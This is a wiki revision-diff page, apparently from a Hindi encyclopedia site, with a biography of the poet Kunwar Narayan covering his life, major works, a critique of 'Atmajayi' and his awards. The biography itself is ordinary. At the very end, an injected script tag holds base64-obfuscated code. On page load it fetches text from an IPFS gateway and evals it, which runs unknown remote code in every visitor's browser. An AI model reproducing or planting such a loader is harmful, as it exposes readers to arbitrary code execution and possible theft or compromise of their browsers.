Difference between revisions of "कुंवर नारायण"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
'''कुंवर नारायण''' (जन्म- [[19 सितम्बर]], [[1927]], [[फैजाबाद]], [[उत्तर प्रदेश]]) [[हिन्दी]] के सम्मानित कवियों में गिने जाते हैं। कुंवर जी की प्रतिष्ठा और आदर [[हिन्दी साहित्य]] की भयानक गुटबाजी के परे सर्वमान्य है। उनकी ख्याति सिर्फ़ एक लेखक की तरह ही नहीं, बल्कि [[कला]] की अनेक विधाओं में गहरी रुचि रखने वाले रसिक विचारक के समान भी है। कुंवर नारायण को अपनी रचनाशीलता में [[इतिहास]] और मिथक के माध्यम से वर्तमान को देखने के लिए जाना जाता है। उनका रचना संसार इतना व्यापक एवं जटिल है कि उसको कोई एक नाम देना सम्भव नहीं है। फ़िल्म समीक्षा तथा अन्य कलाओं पर भी उनके लेख नियमित रूप से पत्र-पत्रिकाओं में छपते रहे हैं। आपने अनेक अन्य भाषाओं के कवियों का हिन्दी में अनुवाद किया है और उनकी स्वयं की कविताओं और कहानियों के कई अनुवाद विभिन्न भारतीय और विदेशी भाषाओं में छपे हैं। 'आत्मजयी' का [[1989]] में इतालवी अनुवाद [[रोम]] से प्रकाशित हो चुका है। 'युगचेतना' और 'नया प्रतीक' तथा 'छायानट' के संपादक-मण्डल में भी कुंवर नारायण रहे हैं।
 
'''कुंवर नारायण''' (जन्म- [[19 सितम्बर]], [[1927]], [[फैजाबाद]], [[उत्तर प्रदेश]]) [[हिन्दी]] के सम्मानित कवियों में गिने जाते हैं। कुंवर जी की प्रतिष्ठा और आदर [[हिन्दी साहित्य]] की भयानक गुटबाजी के परे सर्वमान्य है। उनकी ख्याति सिर्फ़ एक लेखक की तरह ही नहीं, बल्कि [[कला]] की अनेक विधाओं में गहरी रुचि रखने वाले रसिक विचारक के समान भी है। कुंवर नारायण को अपनी रचनाशीलता में [[इतिहास]] और मिथक के माध्यम से वर्तमान को देखने के लिए जाना जाता है। उनका रचना संसार इतना व्यापक एवं जटिल है कि उसको कोई एक नाम देना सम्भव नहीं है। फ़िल्म समीक्षा तथा अन्य कलाओं पर भी उनके लेख नियमित रूप से पत्र-पत्रिकाओं में छपते रहे हैं। आपने अनेक अन्य भाषाओं के कवियों का हिन्दी में अनुवाद किया है और उनकी स्वयं की कविताओं और कहानियों के कई अनुवाद विभिन्न भारतीय और विदेशी भाषाओं में छपे हैं। 'आत्मजयी' का [[1989]] में इतालवी अनुवाद [[रोम]] से प्रकाशित हो चुका है। 'युगचेतना' और 'नया प्रतीक' तथा 'छायानट' के संपादक-मण्डल में भी कुंवर नारायण रहे हैं।
 
==जीवन परिचय==
 
==जीवन परिचय==
19 सितम्बर, 1927 ई. को कुंवर नारायण का जन्म उत्तर प्रदेश के फैजाबाद ज़िले में हुआ था। कुंवर जी ने अपनी इंटर तक की शिक्षा विज्ञान वर्ग के अभ्यर्थी के रूप में प्राप्त की थी, किंतु [[साहित्य]] में रुचि होने के कारण वे आगे साहित्य के विद्यार्थी बन गये थे। उन्होंने 'लखनऊ विश्वविद्यालय' से [[1951]] में अंग्रेज़ी साहित्य में एम.ए. किया। [[1973]] से [[1979]] तक वे '[[संगीत नाटक अकादमी]]' के उप-पीठाध्यक्ष भी रहे। कुंवर जी ने [[1975]] से [[1978]] तक [[अज्ञेय]] द्वारा सम्पादित मासिक पत्रिका में सम्पादक मंडल के सदस्य के रूप में भी कार्य किया। कुंवर नारायण की [[माता]] और फिर बहन की असमय ही टी.बी. की बीमारी से मृत्यु हो गई थी। बीमारी से उनकी बहन बृजरानी की मात्र 19 वर्ष की अवस्था में ही मृत्यु हुई थी। इससे उन्हें बड़ा कष्ट और दु:ख पहुँचा था। कार चलाना कुंवर जी का पैतृक व्यवसाय रहा था। लेकिन इसके साथ-साथ उन्होंने साहित्य जगत में भी अपना प्रवेश कर लिया।
+
19 सितम्बर, 1927 ई. को कुंवर नारायण का जन्म उत्तर प्रदेश के फैजाबाद ज़िले में हुआ था। कुंवर जी ने अपनी इंटर तक की शिक्षा विज्ञान वर्ग के अभ्यर्थी के रूप में प्राप्त की थी, किंतु [[साहित्य]] में रुचि होने के कारण वे आगे साहित्य के विद्यार्थी बन गये थे। उन्होंने 'लखनऊ विश्वविद्यालय' से [[1951]] में अंग्रेज़ी साहित्य में एम.ए. किया। [[1973]] से [[1979]] तक वे '[[संगीत नाटक अकादमी]]' के उप-पीठाध्यक्ष भी रहे। कुंवर जी ने [[1975]] से [[1978]] तक [[अज्ञेय]] द्वारा सम्पादित मासिक पत्रिका में सम्पादक मंडल के सदस्य के रूप में भी कार्य किया। कुंवर नारायण की [[माता]], [[चाचा]] और फिर बहन की असमय ही टी.बी. की बीमारी से मृत्यु हो गई थी। बीमारी से उनकी बहन बृजरानी की मात्र 19 वर्ष की अवस्था में ही मृत्यु हुई थी। इससे उन्हें बड़ा कष्ट और दु:ख पहुँचा था। कार चलाना कुंवर जी का पैतृक व्यवसाय रहा था। लेकिन इसके साथ-साथ उन्होंने साहित्य जगत में भी अपना प्रवेश कर लिया।
 
==लेखन कार्य==
 
==लेखन कार्य==
कुंवर नारायण इस दौर के सर्वश्रेष्ठ साहित्यकार हैं। उनकी काव्ययात्रा 'चक्रव्यूह' से शुरू हुई थी। इसके साथ ही उन्होंने हिन्दी के काव्य पाठकों में एक नई तरह की समझ पैदा की। यद्यपि कुंवर नारायण की मूल विधा कविता ही रही है, किंतु इसके अलावा उन्होंने कहानी, लेख व समीक्षाओं के साथ-साथ सिनेमा, रंगमंच एवं अन्य कलाओं पर भी बखूबी अपनी लेखनी चलायी। इसके चलते जहाँ उनके लेखन में सहज ही संप्रेषणीयता आई, वहीं वे प्रयोगधर्मी भी बने रहे। उनकी कविताओं और कहानियों का कई भारतीय तथा विदेशी भाषाओं में अनुवाद भी हो चुका है। 'तनाव' पत्रिका के लिए उन्होंने कवाफी तथा ब्रोर्खेस की कविताओं का भी अनुवाद किया।
+
कुंवर नारायण इस दौर के सर्वश्रेष्ठ साहित्यकार हैं। उनकी काव्ययात्रा 'चक्रव्यूह' से शुरू हुई थी। इसके साथ ही उन्होंने [[हिन्दी]] के काव्य पाठकों में एक नई तरह की समझ पैदा की। यद्यपि कुंवर नारायण की मूल विधा कविता ही रही है, किंतु इसके अलावा उन्होंने कहानी, लेख व समीक्षाओं के साथ-साथ सिनेमा, रंगमंच एवं अन्य कलाओं पर भी बखूबी अपनी लेखनी चलायी। इसके चलते जहाँ उनके लेखन में सहज ही संप्रेषणीयता आई, वहीं वे प्रयोगधर्मी भी बने रहे। उनकी कविताओं और कहानियों का कई भारतीय तथा विदेशी भाषाओं में अनुवाद भी हो चुका है। 'तनाव' पत्रिका के लिए उन्होंने कवाफी तथा ब्रोर्खेस की कविताओं का भी अनुवाद किया।
 
====प्रमुख कृतियाँ====
 
====प्रमुख कृतियाँ====
 
इनकी प्रमुख निम्नलिखित हैं-
 
इनकी प्रमुख निम्नलिखित हैं-

Revision as of 08:00, 19 September 2012

kuanvar narayan (janm- 19 sitambar, 1927, phaijabad, uttar pradesh) hindi ke sammanit kaviyoan mean gine jate haian. kuanvar ji ki pratishtha aur adar hindi sahity ki bhayanak gutabaji ke pare sarvamany hai. unaki khyati sirf ek lekhak ki tarah hi nahian, balki kala ki anek vidhaoan mean gahari ruchi rakhane vale rasik vicharak ke saman bhi hai. kuanvar narayan ko apani rachanashilata mean itihas aur mithak ke madhyam se vartaman ko dekhane ke lie jana jata hai. unaka rachana sansar itana vyapak evan jatil hai ki usako koee ek nam dena sambhav nahian hai. film samiksha tatha any kalaoan par bhi unake lekh niyamit roop se patr-patrikaoan mean chhapate rahe haian. apane anek any bhashaoan ke kaviyoan ka hindi mean anuvad kiya hai aur unaki svayan ki kavitaoan aur kahaniyoan ke kee anuvad vibhinn bharatiy aur videshi bhashaoan mean chhape haian. 'atmajayi' ka 1989 mean italavi anuvad rom se prakashit ho chuka hai. 'yugachetana' aur 'naya pratik' tatha 'chhayanat' ke sanpadak-mandal mean bhi kuanvar narayan rahe haian.

jivan parichay

19 sitambar, 1927 ee. ko kuanvar narayan ka janm uttar pradesh ke phaijabad zile mean hua tha. kuanvar ji ne apani iantar tak ki shiksha vijnan varg ke abhyarthi ke roop mean prapt ki thi, kiantu sahity mean ruchi hone ke karan ve age sahity ke vidyarthi ban gaye the. unhoanne 'lakhanoo vishvavidyalay' se 1951 mean aangrezi sahity mean em.e. kiya. 1973 se 1979 tak ve 'sangit natak akadami' ke up-pithadhyaksh bhi rahe. kuanvar ji ne 1975 se 1978 tak ajney dvara sampadit masik patrika mean sampadak mandal ke sadasy ke roop mean bhi kary kiya. kuanvar narayan ki mata, chacha aur phir bahan ki asamay hi ti.bi. ki bimari se mrityu ho gee thi. bimari se unaki bahan brijarani ki matr 19 varsh ki avastha mean hi mrityu huee thi. isase unhean b da kasht aur du:kh pahuancha tha. kar chalana kuanvar ji ka paitrik vyavasay raha tha. lekin isake sath-sath unhoanne sahity jagat mean bhi apana pravesh kar liya.

lekhan kary

kuanvar narayan is daur ke sarvashreshth sahityakar haian. unaki kavyayatra 'chakravyooh' se shuroo huee thi. isake sath hi unhoanne hindi ke kavy pathakoan mean ek nee tarah ki samajh paida ki. yadyapi kuanvar narayan ki mool vidha kavita hi rahi hai, kiantu isake alava unhoanne kahani, lekh v samikshaoan ke sath-sath sinema, rangamanch evan any kalaoan par bhi bakhoobi apani lekhani chalayi. isake chalate jahaan unake lekhan mean sahaj hi sanpreshaniyata aee, vahian ve prayogadharmi bhi bane rahe. unaki kavitaoan aur kahaniyoan ka kee bharatiy tatha videshi bhashaoan mean anuvad bhi ho chuka hai. 'tanav' patrika ke lie unhoanne kavaphi tatha brorkhes ki kavitaoan ka bhi anuvad kiya.

pramukh kritiyaan

inaki pramukh nimnalikhit haian-

  1. chakravyooh - 1956
  2. tisara saptak - 1959
  3. parivesh : ham-tum - 1961
  4. apane samane - 1979
  5. atmajayi/prabandh kavy - 1965
  6. akaroan ke asapas - 1971
  7. vajashrava ke bahane
  8. koee doosara nahian
  9. in dinoan

samalochana

inake sangrah 'parivesh ham tum' ke madhyam se manaviy sanbandhoan ki ek viral vyakhya sabake samane aee. unhoanne apane prabandh 'atmajayi' mean mrityu sanbandhi shashvat samasya ko kathopanishad ka madhyam banakar adbhut vyakhya ke sath prastut kiya. isamean nachiketa apane pita ki ajna, 'mrity ve tva dadamiti' arthat 'maian tumhean mrityu ko deta hooan', ko shirodhary manakar mrityu ke devata yamaraj ke dvar par chala jata hai, jahaan vah tin din tak bhookha-pyasa rahakar yamaraj ke ghar lautane ki pratiksha karata hai. usaki is sadhana se prasann hokar yamaraj use tin varadan maangane ki anumati pradan karate haian. nachiketa inamean se pahala varadan yah maangata hai ki usake pita vajashrava ka krodh samapt ho jae. nachiketa ke isi kathan ko adhar banakar kuanvar narayan ki jo kriti 2008 mean 'vajashrava ke bahane' shirshak se aee, usamean unhoanne pita vajashrava ke man mean jo udvelan chalata raha, use atyadhik satvik shabdavali mean kavyabaddh kiya hai.

is kriti ki viral visheshata yah hai ki 'amoort' ko ek atyadhik sookshm sanvedanatmak shabdavali dekar nee utsah parakh jijivisha ko vani di hai. jahaan ek or 'atmajayi' mean kuanvar narayan ne mrityu jaise vishay ka nirvachan kiya hai, vahian isake thik viparit 'vajashrava ke bahane' kriti mean apani vidhayak sanvedana ke sath jivan ke alok ko rekhaankit kiya hai. yah kriti aj ke is barbar samay mean bhatakati huee manasikata ko n keval rahat deti hai, balki yah prerana bhi deti hai ki do pidhiyoan ke bich samanvay banae rakhane ka samajhadar dhang kya ho sakata hai. unhean padhate hue, ye lagata hai ki kuanvar narayan hindi ki kavita ke pichhale 55 varsh ke itihas ke sanbhavatah shreshthatam kavi haian.

puraskar v samman

kuanvar narayan ko 2009 mean varsh 2005 ke 'jnanapith puraskar' se sammanit kiya gaya. 6 aktoobar ko rashtrapati pratibha patil ne unhean desh ke sabase b de sahityik samman se sammanit kiya. kuanvar ji ko 'sahity akadami puraskar', 'vyas samman', 'kumar ashan puraskar', 'premachand puraskar', 'rashtriy kabir samman', 'shalaka samman', 'medal aauf v aaurasa yoonivarsiti', polaiand aur rom ke 'antarrashtriy primiyo fereniya samman' aur 2009 mean 'padmabhooshan' se bhi sammanit kiya ja chuka hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>